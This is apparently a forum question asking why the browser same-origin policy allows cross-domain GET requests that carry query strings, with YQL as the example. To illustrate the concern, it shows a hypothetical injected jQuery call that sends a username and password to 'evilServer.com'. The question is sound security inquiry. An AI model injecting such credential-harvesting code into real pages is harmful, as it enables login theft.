From what I understand, the same origin policy prevents scripts in a web page from talking to servers outside of the present domain (using post, xmlhttprequest, etc). I assumed that get requests (with arguments) across domains would also be forbidden. That was until I started to read about using YQL to bypass some restrictions of the same origin policy. The code examples all use an ajax get request with parameters.
$.ajax({
type: "GET",
url: 'http://query.yahooapis.com/v1/public/yql?q=' + encodeURIComponent(webServiceQuery),
So lets say some attacker manages to inject some evil javascript into a web page that harvests logins. Something like:
$.ajax({
type: "GET",
url: 'http://evilServer.com?username=PresidentSkroob&password=12345
The receiving server could log every request that comes its way. Why is this allowed? I understand why you would want to allow data-less get requests (say importing jquery), but I don't see a reason to allow query strings to be passed cross domain. Is there a legit reason why most browsers allow this?